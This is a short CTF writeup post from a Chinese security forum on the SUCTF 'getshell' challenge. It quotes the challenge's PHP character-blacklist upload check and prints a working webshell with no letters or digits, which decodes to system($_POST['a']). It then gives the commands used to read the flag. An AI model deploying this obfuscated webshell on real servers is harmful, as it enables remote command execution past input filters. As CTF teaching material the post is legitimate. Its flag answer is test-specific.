设为首页
收藏本站
开启辅助访问
切换到窄版
登录
立即注册
只需一步,快速开始
论坛
BBS
Tools
CTF在线工具箱,CTF工具下载
CTF平台1
BugkuCTF - CTF爱好者的练习平台
CTF平台2
搜索
搜索
每日签到
本版
帖子
战队
用户
CTF论坛
»
论坛
›
技术交流
›
CTF/安全技术交流
›
getshell writeup
返回列表
发新帖
[Writeup]
getshell writeup
[复制链接]
8604
|
0
|
2019-6-7 10:31:14
|
显示全部楼层
|
阅读模式
参考连接
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ //这里面的
$_FILES["file"]["tmp_name"]的意思是获取随机文件名,这一段的意思是打开(文件名)
$data=substr($contents,5); //截断临时文件从第五为开始截断
foreach ($black_char as $b) { //foreach是数组循环,这里面的$b就是数组里面的每个内容
if (stripos($data, $b) !== false){ //如果waf在就会报错,而这里我们不知道waf是撒直接上传一个无字符上去
die("illegal char");
}
}
}
这道题的考点就是无字符的shell
上传的无字符webshell
<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);
这个翻译过来就是
system($_POST['a']);
你直接post一个a= ../../../
就会看见一个flag文件
cat ../../../falg文件 即可
最后答案SUCTF{fake_flag_web_b}
评分
参与人数
1
银两
+2
收起
理由
Harry
+ 2
查看全部评分
回复
使用道具
举报
变色卡
照妖镜
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
htftime
2
主题
3
帖子
18
积分
初入江湖
初入江湖, 积分 18, 距离下一级还需 32 积分
初入江湖, 积分 18, 距离下一级还需 32 积分
积分
18
发消息
回复楼主
返回列表
新手入门/靶场实验
CTF/安全技术交流
CTF题库/赛事预告